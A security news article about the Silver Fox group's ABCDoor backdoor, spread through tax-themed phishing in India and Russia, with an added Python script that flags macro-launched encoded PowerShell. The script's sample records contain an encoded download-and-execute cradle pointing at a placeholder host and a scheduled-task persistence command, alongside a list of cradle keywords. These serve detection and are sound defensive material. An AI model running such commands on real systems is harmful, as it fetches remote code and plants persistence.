Silver Fox ABCDoor Malware Hits India, Russia via Tax Phishing
The China-based advanced persistent threat (APT) group Silver Fox, also tracked as Monarch, SwimSnake, The Great Thief of Valley, UTG-Q-1000, and Void Arachne, has launched a sophisticated campaign deploying the ABCDoor backdoor malware against organizations in India and Russia. The operation, which security researchers began tracking in late 2024, leverages tax-themed phishing emails designed to harvest credentials and compromise enterprise networks across multiple sectors. The group has historically targeted financial institutions, manufacturing companies, and government agencies in the Asia-Pacific and Eastern European regions, and this latest campaign continues that pattern of economic espionage and data theft.
The ABCDoor malware, a custom backdoor previously associated with the Void Arachne threat cluster, provides threat actors with persistent remote access to compromised systems. Technical analysis reveals that ABCDoor employs AES-256 encryption to mask command-and-control (C2) communications and uses scheduled tasks for persistence on infected Windows hosts. Once executed, the malware establishes a connection with attacker-controlled infrastructure and enables comprehensive surveillance of the host, including keystroke logging, screen capture, and file exfiltration. Researchers have identified behavioral patterns indicating that the malware specifically targets browser credentials, SSH keys, and VPN authentication tokens on victim machines.
The phishing component of this campaign employs fraudulent tax-related documents, including fake GST (Goods and Services Tax) invoices, income tax refund notifications, and TDS (Tax Deducted at Source) certificates. The emails originate from domains that mimic legitimate government tax portals such as incometaxindia.gov.in and gosusite.ru, increasing the likelihood of victim engagement. The attack chain relies on macro-enabled documents that execute PowerShell scripts to download and install the ABCDoor backdoor. Security researchers have documented specific indicators of compromise (IOCs), including malicious file hashes, suspicious domains, and encoded PowerShell commands observed in affected enterprise environments.
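As an added illustration of the defender's view of the attack chain described above (an Office macro launching encoded PowerShell, followed by scheduled-task persistence as noted for ABCDoor), the Python below triages constructed Sysmon-style process-creation records. It is not code from the original article or from any vendor report; the record fields, process names and sample command lines are assumptions, and the encoded payload is a constructed download cradle pointing at a placeholder host.

```python
import base64
import re

# Constructed sample telemetry (Sysmon-style process-creation records). Not real IOCs.
EVENTS = [
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand " + base64.b64encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/tds.ps1')"
         .encode("utf-16le")).decode()},
    {"parent": "powershell.exe", "image": "schtasks.exe",
     "cmdline": "schtasks.exe /Create /SC MINUTE /MO 15 /TN Updater /TR C:\\Users\\Public\\svc.exe"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
]

OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}
# Common PowerShell download-cradle primitives; matched against the decoded payload.
CRADLE_PATTERNS = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\bIWR\b|Net\.WebClient|Start-BitsTransfer", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text), or None."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(ev):
    """Return the list of detection names triggered by one process-creation record."""
    hits = []
    image = ev["image"].lower()
    if image == "powershell.exe" and ev["parent"].upper() in OFFICE_PARENTS:
        hits.append("office_spawned_powershell")          # macro document -> PowerShell
    decoded = decode_encoded_command(ev["cmdline"])
    if decoded is not None:
        hits.append("encoded_powershell")                 # -EncodedCommand present
        if CRADLE_PATTERNS.search(decoded):
            hits.append("download_cradle")                # decoded payload fetches a stage
    if (image == "schtasks.exe" and "/create" in ev["cmdline"].lower()
            and ev["parent"].lower() == "powershell.exe"):
        hits.append("scheduled_task_from_powershell")     # persistence via scheduled task
    return hits

def triage(events):
    """Return (image, hits) for every record that triggered at least one detection."""
    results = []
    for ev in events:
        hits = analyze_event(ev)
        if hits:
            results.append((ev["image"], hits))
    return results
```

Decoding the payload before matching matters here: the cradle keywords never appear in the raw command line, only in the UTF-16LE text behind the base64.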
Organizations in India and Russia, particularly those operating in the banking, manufacturing, and government sectors, are strongly advised to enhance email security controls and conduct user awareness training focused on phishing detection. Security teams should implement network monitoring for the identified IOCs and consider threat hunting activities to identify potential compromises. This activity exemplifies the ongoing threat posed by China-linked APT groups targeting economic intelligence and intellectual property across multiple geographic regions.